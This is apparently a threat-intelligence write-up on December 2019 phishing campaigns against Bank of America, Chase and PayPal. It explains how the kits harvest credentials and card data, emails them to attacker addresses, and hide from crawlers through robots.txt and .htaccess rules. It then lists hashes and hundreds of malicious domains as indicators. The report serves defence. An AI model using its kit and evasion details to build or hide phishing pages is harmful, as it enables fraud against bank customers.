The Dark Water Journal: American Phisher
The following article presents an independent investigation into three separate phishing campaigns which were active during December 2019. They impacted Bank of America, Chase Bank (JP Morgan Chase) and PayPal. Although there are several active phishing campaigns targeting these global companies, I focused on these particulat three campaigns because they all share two common characteristic:
- the attackers used mainly compromised websites to host and deliver the phishing kits
- parts of the phishing kits used in these campaigns are several years old and available on the public internet for download
Initially the investigation started with the analysis of the phishing campaign against Bank of America, but while hunting for the phishing kit on a compromised website I discovered another phishing kit targeting Chase Bank.
Based on the available data and from the conclusions drawn from the investigation the three phishing campaigns are not correlated. There is a certain “modus operandi” observed in all three campaigns and the threat actors behind them share some common TTPs. But, key indicators required in order to correlate the campaigns, and attribute them to a single threat actor were not identified.
Chapter 1: Bank of America Phishing Campaign
The phishing campaign against Bank of America was observed and tracked since December 3rd 2019 until it reached an apex around December 15 with around 1500 compromised websites which hosted the phishing kit. Since then the campaign has lost some momentum.
It’s safe to assume that all information that a user types in the forms displayed in the phishing page will be captured by the attacker, but from a forensics perspective I want to understand the mechanics behind the attack. This is very important for both legal offensive and defensive purposes (for example for red teaming or for incident response).
The next step in the investigation was to identify, retrieve and analyze the phishing kit used in the campaign. Using BlackShark I identified several compromised websites and the phishing kit was found on one of them archived under the name “bofanew1.zip”.
The analysis revealed two php scripts named “post1.php” and “post2.php” which contained the malicious actions. The “post1.php” is used to capture the following user information: country, current date and time, browser agent, hostname, user ID, password and client IP address.
The captured data is sent via email to the “shemarmooremg121@gmail.com”.
The “post2.php” is used by the attacker to capture the answers to additional questions that the user is requested to answer:
The captured data is sent via email to the “shemarmooremg121@gmail.com”.
I searched the hashes of the php scripts on the antivirus databases and threat intelligence feeds and “step2.php” was identified as malicious by several antivirus engines and was first submitted to VirusTotal on February 2018. The other files hashes were not found on VirusTotal or other databases:
- post1.php 1356FC54520C18F7580531B200CC677C9C59D25E3FE8C59AB9ED80B9A56B0A36
- post2.php D5242737A7C9BFB355193F8F1DE7DCDCC36DE425600EAA50B9585C69041E32B6
- step2.php 524A962A5D2299E9658478932EFAEDEC226DE805A0AF17A0BF824990598761F7
- step3.php 5b37e48b5f52d1246d7243c2b49d1d2841e887b72bb48a8daeae91f3b8844c7b
Since the campaign uses mostly compromised websites, it is fairly easy for users to identify the spoofed BoA websites by looking at the URL.
Chapter 2: Chase Bank Phishing Campaign
Like previously mentioned I discovered the campaign against Chase Bank while I was investigating the BoA phishing campaign. During the hunt for the BoA phishing kit I discovered another kit on the same compromised website named “chasefulll(2).zip”. From the timestamp it was deployed in December 12, 2019.
The second phishing kit is more complex than the one found for BoA. It uses several methods to hide from search engines and security web crawlers but like the BoA phishing kit is uses email messages to transmit captured data to the attacker. The Chase Bank phishing kit appears to be created by someone nicknamed “AK360WIRE”.
The kit’s first evasion method uses a “robots.txt” file which disallows access to the phishing kit folder to the following services: Googlebot, googlebot-image, googlebot-mobile, MSNBot, Slurp, Teoma, Gigabot, Robozilla, Nutch,
ia_archiver, archive.org_bot, baiduspider, naverbot, yeti, yahoo-mmcrawler, psbot, yahoo-blogs/v3.9, AhrefsBot, MJ12bot, Majestic-12, Majestic-SEO, DSearch, Rogerbot, SemrushBot, BLEXBot, ScoutJet, SearchmetricsBot, BacklinkCrawler, Exabot, spbot, linkdexbot, Lipperhey Spider, SEOkicks-Robot and sistrix.
The second evasion technique uses the “.htaccess” which includes the rules from the “robots.txt” and additionally has rules to deny access from the several IP sub-nets.
The phishing kit contains several php scripts designed to capture sensitive user information. The “email.php” script is used to capture general user information like: time and date, browser agent, hostname, email, password, client IP and country.
The “email1.php” is used to capture more detailed user information: Full Name, Full Address, Address Line 2, City, State, Zip Code, Home Phone, Mobile Phone, SSN, Mother’s Maiden Name, date of birth, credit card number, CVV, credit card PIN, credit card expiration date.
The captured information is sent to the “companyresultbox121@gmail.com” email address.
The hashes of the php scripts are presented below. At the moment of the investigation they were not found on the public internet or on VirusTotal:
- action.php 3C375E0E65B491CBBD53AA95554524B2CF9AAD695888B7D4AF0B09DA545AA044
- email.php 8421A3CBDB12993EF3241FBF4284C68626A6BCF0EE7B7BEF7032E9C2907D237E
- email1.php 0C747C0E513C04E0C5032390D8D7A73D5AF1212BFB13EC0CF240E09D4280C986
The number of compromised websites hosting the phishing kit was around 300 during the investigation. At the moment of the investigation the campaign was still ongoing.
Chapter 3: PayPal Phishing Campaign
The last phishing campaign investigated in December 2019 was against PayPal.
In this case the campaign was identified because several Romanian websites were compromised and the “Scam PayPal” phishing kit was deployed on them.
Using BlackShark a number of 386 compromised websites were identified, and again the next step was to retrieve the phishing kits from the websites for analysis. The phishing kits were retrieved from several websites together with log files which contained the victim IP addresses and countries. This enabled me to start tracking phishing campaign and gain additional intelligence and metrics on it’s effectiveness. This activity was performed starting from 15 December until 19 December 2019.
The log files found on 3 compromised websites were used to analyze the performance of the phishing campaign. During the analysis the number of impacted countries was 73 and the total number of identified potential victims was around 12,000.
The analysis of the phishing kit uncovered the existence of different modules designed to capture vast amount of user personal and sensitive information. Since the phishing kit can be found on the public internet a detailed analysis of it’s capabilities will not be performed in this article. Some snippets of the kit’s features are presented in the following screenshots:
The only interesting part in the analysis of the “Scam PayPal” kit was to identify the email address used by the attacker to retrieve the captured data. In this campaign the attacker used the “bouesgs@gmail.com” email address to retrieve captured data.
Conclusions
There are several conclusions that can be drawn from these phishing campaigns. The first conclusion is that the attackers prefer to compromise WorldPress websites to upload php based phishing kits. The second conclusion is that the attackers are re-using known phishing kits and prefer to retrieve capture data via email messages and the third conclusion is that the attackers have made some mistakes related to operational security which exposed the phishing kits configuration files.
Since at this moment the campaigns are still active I will present, again, below the email addresses used by the attackers for each of the three phishing campaigns:
- Bank of America — shemarmooremg121@gmail.com
- Chase Bank — companyresultbox121@gmail.com
- PayPal — bouesgs@gmail.com
IOCs (Indicators of Compromise)
Bank of America — Compromised phishing domains
· leesangku.com
· protectionforboa.webcindario.com
· edorinamannow.com
· nvh.r70.su
· leckerreinschneideir.de
· riddlespublicschool.co.in
· banamexi.com
· maleficent-blackboa.000webhostapp.com
· cfkcanada.org
· sport.zyr.su
· titlesettlements.com.au
· tips-n-tricks.org
· srproject.com.au
· tanish-bilish.net
· ovejanegradg.com
· dalkingsardines.ne.kr
· hostroady.com
· bb.bet-db.com
· assalweb.org
· fullzbofa.webcindario.com
· socialbranding.es
· taxi-ubk.ru
· pousadabeiradamata.com
· iboahome.com
· jn-accounting.com
· soulpassages.com.au
· www.hstars.xyz
· cosechandolluvia.com
· rdtransportstar.com
· softwaremetrics.com
· chentaichichuanportugal.com
· dashboard.wonderfo.land
· cnsenxiang.com
· avontrophies.com
· ifreightquote.com
· vintagesworks.000webhostapp.com
· paivense.pt
· dominating-schedule.000webhostapp.com
· kreativeweb.ch
· pathtek.com.au
· staff-fatturazione30.com
· www.sksmmangaluru.org
· www.csgt.cf
· lifeboatcare.com
· pracwdctice.com
· designsbyahs.com
· squarespacdashboard.com
· www.in-screen.co
· udpathrikarphrm.com
· dashboardaza-hel6sfpcb.now.sh
· transformer-toy.com
· cretan-punches.000webhostapp.com
· backboardgrouse.co.za
· protectbofa.webcindario.com
· centerbofa.webcindario.com
· tetrasporic-doorste.000webhostapp.com
· lojas-protocolo-net.umbler.net
· www.dhilloncraneservice.com
· u483012q2v.ha003.t.justns.ru
· taqe.net
· dhilloncraneservice.com
· americanas-r.duckdns.org
· www.creid.asia
· americanexpress-form.com
· u543322qfp.ha003.t.justns.ru
· banokofamerican.com
· bayolamed.com
· creid.asia
· americanas-o.joomla.com
· www.dezrussia.ru
· dezrussia.ru
· www.drgabriella.com
· www.bayolamed.com
· bankofamerica.online.grandcdn.net
· cbankofamericab.webcindario.com
· 20.36.27.247
· bankofamerica-t.webcindario.com
· americansurf.webcindario.com
· www488.americanas-natalprodutos.com
· american-in-france.com
· bankofamerica.com.albadiah-stone.com
· americanas-oferta-blackfriday.joomla.com
· sufhgjnnweb.com
· americanfever.austinconversionoptimization.com
· shelbylu.com
· bidgedeer.com
· deexterior.info
· barnkofamerica.webcindario.com
· solusirumahbocor.com
· b0f44ever.webcindario.com
· www.bank-of-america-online.u546292r9e.ha003.t.justns.ru
· importantnotificationalertonlineresetclicklinksdfs2352.000webhostapp.com
· bankofamerica-sz.webcindario.com
· bankofamerica.com.online-banking.mobile-and-online-banking.features.sewatabletandroid.com
· americanas-r.joomla.com
· couplesconnect.cc
· bank-of-america-online.u546292r9e.ha003.t.justns.ru
· promerejesperamericapro.com
· momento-natalino.com
· www.bankofamerica.com.online-banking.mobile-and-online-banking.features.sewatabletandroid.com
· oferta-americanas-blacknight.joomla.com
· studio-liorit.co.il
· asd.dyndns.dk
· thebondigrocer.com
· indie120d.com
· www.indie120d.com
· backofamerica.duckdns.org
· telalmakkah.com
· america-nas-melhor-do-mercado.com
· sowalsky.com
Chase Bank — Compromised phishing domains
· bantez.com
· chase-online-veri.000webhostapp.com
· c-chase-xm.duckdns.org
· tierras-andinas.com
· xelbd.com
· applefrogs.cf
· www.g4guru.com
· m.fb.com-xqdyvjggzhxb.getrealestatehelpblog.com
· www.vadodaramarathon.com
· dcjnkmsytu.org
· emed-depot.com
· wealth-kart.com
· twitchgermicide.co.kr
· www.mdacuae.com
· clustercirpia.co.kr
· basketballcirpia.co.kr
· therapystickety.co.kr
· vatslyfoundation.com
· acaa.cf
· chase.com.us.farzana-lace.com
· www.bonasecco.com.br
· nama83.3dfine.com
· nama83.com
· www.wadigaitan.com
· testsabroad.com
· profoundisreal.com
· houstoncarpetcleaning.com
· dashboard.wonderfo.land
· lonestarcommissary.com
· mtk.webroyal.ro
· somethingoldsomethingnew.com
· www.finbusinessforum.com
· kb-healthcare.com
· untranslated-launch.000webhostapp.com
· www.pousadabeiradamata.com
· knbhost.com
· modaitaliana.000webhostapp.com
· pousadabeiradamata.com
· chase.aneegroup.com
· nafaneef.com
· chase-authonline.000webhostapp.com
· vrfy-portal-nocharges-chase-secure0nline-b2sb.000webhostapp.com
· high-grade-sights.000webhostapp.com
· flashing-quart.000webhostapp.com
· endearing-breach.000webhostapp.com
· chasejpmorgn.myddns.me
· pleasureful-streets.000webhostapp.com
· ostracodan-squares.000webhostapp.com
· paediatric-deposits.000webhostapp.com
· brachydactylic-shou.000webhostapp.com
· mind-altering-direc.000webhostapp.com
· rowdyish-delimiter.000webhostapp.com
· safesecurealert.000webhostapp.com
· laughing-drugs.000webhostapp.com
· www.chaseonline.com.secured.kafgroup.se
· supercriminal-axes.000webhostapp.com
· secureb1chase.000webhostapp.com
· gonococcoid-hook.000webhostapp.com
· shattering-superint.000webhostapp.com
· d1wuojemv4s7aw.cloudfront.net
· wschnople.ooguy.com
· flexuous-fold.000webhostapp.com
· chase-idauth-online.000webhostapp.com
· unemotional-handler.000webhostapp.com
· oxybajinfo.000webhostapp.com
· geometrid-lens.000webhostapp.com
· scraped-december.000webhostapp.com
· ablutionary-seeds.000webhostapp.com
· littery-groups.000webhostapp.com
· hiveless-pops.000webhostapp.com
· platonic-retrievals.000webhostapp.com
· 141.136.44.153
· rhomboid-attesting.000webhostapp.com
· nafitravel.nafster.com
· villous-gangs.000webhostapp.com
· tarsal-fifties.000webhostapp.com
· birdlike-collector.000webhostapp.com
· photic-canals.000webhostapp.com
· consonantal-semicol.000webhostapp.com
· check-redirect.000webhostapp.com
· www.daugiatoanthanh.com.vn
· faryrock.ml
· refractive-farad.000webhostapp.com
· icteric-silver.000webhostapp.com
· indefeasible-twin.000webhostapp.com
· undisciplinable-dia.000webhostapp.com
· incommensurable-pri.000webhostapp.com
· unsensitive-voids.000webhostapp.com
· old-rose-acquisitio.000webhostapp.com
· incognito-algebra.000webhostapp.com
· bent-spark.000webhostapp.com
· curtal-sunday.000webhostapp.com
· lms.evoluce.com.br
· justdesign.gr
· situate-battles.000webhostapp.com
· corporate-helmsman.000webhostapp.com
· haaratelier-cloppenburg.de
· lozenged-schoolroom.000webhostapp.com
· famed-twine.000webhostapp.com
· bacciferous-mailbox.000webhostapp.com
· protrusile-holddown.000webhostapp.com
· undischarged-punctu.000webhostapp.com
· zigzag-symptoms.000webhostapp.com
· cuneal-counter.000webhostapp.com
· lumbering-yaws.000webhostapp.com
· dirty-movements.000webhostapp.com
· potent-cries.000webhostapp.com
· bulbous-years.000webhostapp.com
· canarese-establishm.000webhostapp.com
· tetrandrous-shots.000webhostapp.com
· infuriated-purchase.000webhostapp.com
· hereditary-subtotal.000webhostapp.com
· long-haired-refrige.000webhostapp.com
· zarathustric-jewels.000webhostapp.com
· thetic-attachment.000webhostapp.com
· placoid-indicate.000webhostapp.com
· soggy-tendency.000webhostapp.com
· commonsense-verb.000webhostapp.com
· demandable-satellit.000webhostapp.com
· baptist-tax.000webhostapp.com
· www.mycom.no
· utilized-compasses.000webhostapp.com
· exploitative-instal.000webhostapp.com
· seen-knob.000webhostapp.com
· serbuseru11.000webhostapp.com
· unrelaxed-paste.000webhostapp.com
· productive-mates.000webhostapp.com
· fluent-word.000webhostapp.com
· bendwise-recording.000webhostapp.com
· geomedical-fourths.000webhostapp.com
· connecting-superstr.000webhostapp.com
· air-minded-iron.000webhostapp.com
· abdicable-watts.000webhostapp.com
· mongrel-grasp.000webhostapp.com
· antarctic-debit.000webhostapp.com
· apocryphal-chills.000webhostapp.com
· uninaugurated-sail.000webhostapp.com
· crispate-decibel.000webhostapp.com
· hiemal-threaders.000webhostapp.com
· bearing-baskets.000webhostapp.com
· chaseauthconfim.000webhostapp.com
· airexcelonline.co.tz
· public-purchase.000webhostapp.com
· bacoaq.000webhostapp.com
· aryan-noun.000webhostapp.com
· amazonredirectyou.000webhostapp.com
· beeriest-charts.000webhostapp.com
· fungous-compasses.000webhostapp.com
· leaderless-bags.000webhostapp.com
· barffordogs.co.za
· long-headed-injecti.000webhostapp.com
· secure942b-quickallreview-chase.000webhostapp.com
· esecurechase.000webhostapp.com
· exsanguine-bandages.000webhostapp.com
· superimposed-jumper.000webhostapp.com
· unloving-deposition.000webhostapp.com
· burseraceous-barge.000webhostapp.com
· insectivorous-dock.000webhostapp.com
· calabrian-centers.000webhostapp.com
· goodmastercare.org
· wry-necked-paw.000webhostapp.com
· clarified-interval.000webhostapp.com
· globaltokenx.com
· drive-image.000webhostapp.com
· unpalatable-tail.000webhostapp.com
· unrepresented-bell.000webhostapp.com
· protrusile-turpitud.000webhostapp.com
· neighborless-engine.000webhostapp.com
· intact-orders.000webhostapp.com
· unoxidised-kits.000webhostapp.com
· paivense.pt
· pencilled-societies.000webhostapp.com
· tolerable-disk.000webhostapp.com
· sudanese-formation.000webhostapp.com
· cronite-nac.com
· convinced-sack.000webhostapp.com
· pop-breakdown.000webhostapp.com
· translunar-evaluati.000webhostapp.com
· overjoyed-multiplic.000webhostapp.com
· stammering-humor.000webhostapp.com
· backless-fleets.000webhostapp.com
· vibrating-fall.000webhostapp.com
· blotched-molecules.000webhostapp.com
· instinctive-rebound.000webhostapp.com
· alcp-patmos.com
· reclinable-taste.000webhostapp.com
· disputable-coils.000webhostapp.com
· untoned-bottles.000webhostapp.com
· buff-wages.000webhostapp.com
· intelligible-fee.000webhostapp.com
· overneat-tuition.000webhostapp.com
· appositely-checkout.000webhostapp.com
· penial-guilt.000webhostapp.com
· thready-blueprints.000webhostapp.com
· buttocked-pyramids.000webhostapp.com
· colorific-wardrooms.000webhostapp.com
· setose-flower.000webhostapp.com
· imprisoned-freight.000webhostapp.com
· simplex-stoppered.000webhostapp.com
· investigative-battl.000webhostapp.com
· evincible-dozen.000webhostapp.com
· tularaemic-discipli.000webhostapp.com
· notational-spoon.000webhostapp.com
· theroid-porters.000webhostapp.com
· gneissic-terrains.000webhostapp.com
· erodent-hickories.000webhostapp.com
· chocker-strike.000webhostapp.com
· autoplastic-zone.000webhostapp.com
· incorporeal-girl.000webhostapp.com
· unforsaken-verb.000webhostapp.com
· proclaimed-pictures.000webhostapp.com
· becoming-silences.000webhostapp.com
· unwatered-analyzer.000webhostapp.com
· unswept-nozzle.000webhostapp.com
· gaugeable-thermals.000webhostapp.com
· mossy-stem.000webhostapp.com
· jailed-quartermaste.000webhostapp.com
· phthalic-half.000webhostapp.com
· recitative-supplies.000webhostapp.com
· retinoscopy-aviatio.000webhostapp.com
· cismontane-tracker.000webhostapp.com
· nobby-sling.000webhostapp.com
· populous-sites.000webhostapp.com
· chase344539.000webhostapp.com
· biennial-axes.000webhostapp.com
· intellectualism-dus.000webhostapp.com
· pointless-replaceme.000webhostapp.com
· bijou-escorts.000webhostapp.com
· uncompromising-refu.000webhostapp.com
· immotile-cane.000webhostapp.com
· healable-coal.000webhostapp.com
· ashy-sets.000webhostapp.com
· sclerous-tablet.000webhostapp.com
· iridaceous-stalls.000webhostapp.com
· untrusty-touches.000webhostapp.com
· chase-co.000webhostapp.com
· problematical-elimi.000webhostapp.com
· deceptive-freshwate.000webhostapp.com
· diminutive-signals.000webhostapp.com
· supercilious-mate.000webhostapp.com
· chase-idauthonline.000webhostapp.com
· decretory-fears.000webhostapp.com
· monocarpic-acquitta.000webhostapp.com
· unstarched-public.000webhostapp.com
· chasealert45.000webhostapp.com
· rombomillers.com
· asmasihotels.co.tz
· cephalalgic-pines.000webhostapp.com
· galvanizing-bytes.000webhostapp.com
· www.experiencedjanitorial.com
· livrychess.com
· undetected-widths.000webhostapp.com
· bustling-societies.000webhostapp.com
· safariii.000webhostapp.com
· submiss-mediums.000webhostapp.com
· densest-mints.000webhostapp.com
· pearlsoftheemirates.com
· hygrophytic-rower.000webhostapp.com
· subarctic-religions.000webhostapp.com
· resalable-explanati.000webhostapp.com
· roasted-branches.000webhostapp.com
· g4guru.com
· zincographic-reduct.000webhostapp.com
· excitative-ticks.000webhostapp.com
· statuary-snow.000webhostapp.com
· sinless-sequences.000webhostapp.com
· fluorometric-strut.000webhostapp.com
· chaseonline.chase.com.logon.aspx.bengaltourism.in
· self-loving-bombs.000webhostapp.com
· pops-echo.000webhostapp.com
· archivosysuministros.com
· chase-alert67128.000webhostapp.com
· chase-alert8329.000webhostapp.com
· chasealert28.000webhostapp.com
· chloric-computers.000webhostapp.com
· coagulatory-rank.000webhostapp.com
· osmotic-paragraph.000webhostapp.com
· chaseonlinedvhsa.000webhostapp.com
· newtimecia.com.br
· watkinsshawreunion.com
· chase1p.com
· exlibrismortis.org
· www.yfega.com
· verisecure01.duckdns.org
· yfega.com
· dearenlightenedones.top
· becoming-flares.000webhostapp.com
· winningflips.com
· treed-rail.000webhostapp.com
· tour.promocod.net
· smirched-transmitta.000webhostapp.com
· appositive-canister.000webhostapp.com
· terabonengineering.top
· chaseonline.chase.com.logon.aspx.expandedapps.com
· chasenotice00.webcindario.com
· chaseonlinevaefrthyuim.000webhostapp.com
· chase.com.aeroportojeri.com.br
· www.profoundisreal.com
· kreativeweb.ch
· chaseonlineunyrderatec.000webhostapp.com
· chaseonlineqcrhnusabcr.000webhostapp.com
· ropeable-desire.000webhostapp.com
· chaseonlinetebtyukjugf.000webhostapp.com
· deckitpl.com
· chaseonlineynoitcearma.000webhostapp.com
· chaseonlineacrgrfthfgd.000webhostapp.com
· chaseonlinetegvsaefvze.000webhostapp.com
· staff-fatturazione30.com
· chaseonlinebwesazcrhna.000webhostapp.com
· susannawade.org.uk
· chasejpmore.bounceme.net
· ilovebmw.org
· www.inventrom.com
· maisenwenhua.cn
· chasesecureonline.000webhostapp.com
· chaseonlinerthfergdyrh.000webhostapp.com
· www.sunglasses-for-girls.com
· secure05c-chase.000webhostapp.com
· chaseonlinetechnical.app.link
· secure06c-chase.000webhostapp.com
· secuport01.duckdns.org
· cockroachpestcontrols.com
· nankangtyres.com.au
· secure08c-chase.000webhostapp.com
· rankrobotics.com
· chasejpmorgan.ddnsking.com
· secure07c-chase.000webhostapp.com
· torbasmyka.pl
· offlimits.co.nz
· fastpackersandmovers.com
· livrosdigitais.com.br
· violent-fittings.000webhostapp.com
· auth-chase1auth.000webhostapp.com
· www.mac1servis.rs
· pagevids.com
· tgsbakery.com
· secure09c-chase.000webhostapp.com
· melancholy-torpedo.000webhostapp.com
· snfcar.com
· frequent-object.000webhostapp.com
· chinchwaddeosthan.org
· laptopreleases.top
· theinnovatinglife.top
· savings-chase-online.com
· newbeliefs-newreality.com
· glaucomatous-soleno.000webhostapp.com
· chatoyant-fathers.000webhostapp.com
· recallable-addresse.000webhostapp.com
· www.edmissionconsulting.com
· diadem.vn
· geitonogamous-acqui.000webhostapp.com
· unseconded-signific.000webhostapp.com
· yobrit.com
· harmanpreetkaurworld.com
· security4s-chase.com
· turkiyedunyamedya.com
· technical1s-chase.com
· checkorder.top
· www.neemejarvi.ee
· xscarlet.com
· jordanjuarez.com
· 3.136.189.32
· chasecure0be.servecounterstrike.com
· southerncaliforniapowerstrokes.com
· chase6j.com
· chaseonline.com.secured.kafgroup.se
· mauimassages.top
· srikrishnamrudulahospital.com
· chaseonlineverfvyumhngare.000webhostapp.com
· scaleandsave.top
· hotelechurrascariabrasil.com.br
· sentoutbox.com
· 167.114.18.208
· finemsms.com
· www.issudacote.fr
· cashapp-center-review-48797.000webhostapp.com
· collaborative-mista.000webhostapp.com
· djcsites.com.br
· puremining.group
· ungowned-identifica.000webhostapp.com
PayPal — Compromised phishing domains
· paypal.aidan1234567898.repl.co
· 107.175.178.114
· uoffended.me
· mitausa.com
· www.paypal.gtpl.pro
· thanhthangfurniture.vn
· paypalcancelingorder.info
· paypal.security-login-9844.com
· paypal — aidan1234567898.repl.co
· paypal-konto-anmeldung-deutschland.info
· paypal-sicherheit-kundenkonto-support.info
· lock-down13.tk
· paypal-konto-sicherheit.com
· paypal.security-login-1412.com
· edukiespirita.com.br
· proxyprincipal.appspot.com
· paypal.co.uk.jmm3.icu
· paypal.co.uk.d42r.icu
· paypal.com.home.paypalonline.online.ihsanaktas.av.tr
· paypal.com-update-your-account-information-for-security-update.bagaskarafurniture.com
· bursamarketotomasyonu.com
· papumdg.com.br
· tosecurityserver.yj.fr
· mrstuzzichini.com.au
· dotilo.com
· majik102502.appspot.com
· vaguefarawayexecutables.aidan1234567898.repl.co
· paypal.co.uk.f9wj.icu
· paypal.co.uk.erph.icu
· paypal.co.uk.a0bq.icu
· paypal.co.uk.fi2s.icu
· paypal.co.uk.4xts.icu
· medcert.com.ng
· osframa.ong.br
· paypal-kundenkonto-sicherheit-anmeldung.info
· bopia168.com
· brand2hand.com
· inovacaoconsulting.com.br
· paypal.co.uk.i8n9.icu
· jkkn.ac.in
· paypal.security-1612.com
· paypal.security-9879.com
· www.brianbegin.com
· m.fb.com-xqdyvjggzhxb.getrealestatehelpblog.com
· paypalcertain.com
· monikareplin.pl
· applepaymentpartner.com
· mobiledach.com
· login-paypal-esp.webcindario.com
· autorizador5.com.br
· stopcarpeliculas.com.br
· security-9879.com
· majestichall.com.br
· paypal.co.uk.5bdi.icu
· paypal.co.uk.gkc1.icu
· paypal.co.uk.j9fq.icu
· churrascariameinhaus.com.br
· marioliveirapersonal.com.br
· paypal.com-update-information.secure.yo.fr
· www.sitioritmosdaterra.com.br
· badhaee.com
· selfstorageofshepherdstown.com
· waynes.com.br
· helpsecurepaypal.academiadasaguias.com.br
· salonvillaflamingos.com.mx
· paypal.co.uk.599l.icu
· paypal.co.uk.18w2.icu
· paypal.co.uk.e78v.icu
· paypal.co.uk.ebw3.icu
· paypal.co.uk.8d1d.icu
· www.jovilbermoy.com
· paypal.gtpl.pro
· kjsa.com
· oaimages.com
· paypal.com.au-dispute50043.gajsiddhiglobal.com
· www.accountsnavigator-servicede-helpoverview.eu
· 12freetoken.000webhostapp.com
· paypal-us-helpspay.gitlab.io
· a0376939.xsph.ru
· paradiseinfosoft.com
· www.oncura.co.in
· paypal.co.uk.o7cw.icu
· paypal.co.uk.o5yq.icu
· www.autorizador5.com.br
· www.marioliveirapersonal.com.br
· paypal.co.uk.2v9y.icu
· www.mrstuzzichini.com.au
· contex.vn
· security.paypal.com.userid.874585.compraycambia.com
· cartatocantins.com.br
· www.kruegerama.de
· offcialsupport.000webhostapp.com
· www.paypal.com.myhr.app.aruntest.shnpoc.net
· ortiz.adleverage.com
· paypal.co.uk.3lsv.icu
· evoxhosting.com
· www.edukiespirita.com.br
· www.paypal.com.au-dispute50043.gajsiddhiglobal.com
· paypal.co.uk.5oge.icu
· paypal-helps-seller-ebay.gitlab.io
· paypal.finprac.in
· paypal-verification-protective-com.preview-domain.com
· argosfurnishers.co.ke
· atter.us
· paypalupdateinfo.voterpacks.com
· authenticate05c.ddns.net
· paypal.helpcentre-gb.com
· codesoft.io
· www.committedgiving.uk.net
· inc-paypal.fr
· 104.225.1.76
· rhinocomp.co.uk
· spice-812.ga
· www.majik102502.appspot.com
· paypal.co.uk.t0k4.icu
· atwarsa.com
· paypal.co.uk.m9fx.icu
· paypalverisign.com
· paypal.login-9302.com
· paypal.login-2312.com
· ppl-requirements-account.000webhostapp.com
· paypaleither.com
· www.atwarsa.com
· lauroreparis-eshop.com
· paypalrequired.com
· paypal.topcarts.com
· paypalactions.com
· kruegerama.de
· anasberouba.000webhostapp.com
· paypalability.com
· vaguefarawayexecutables — aidan1234567898.repl.co
· www.atter.us
· paypal.secure2-limited-uk.com
· service-investigation.fr
· www.cheaproomsvalencia.com
· verify.direct
· paypal.co.uk.qjm6.icu
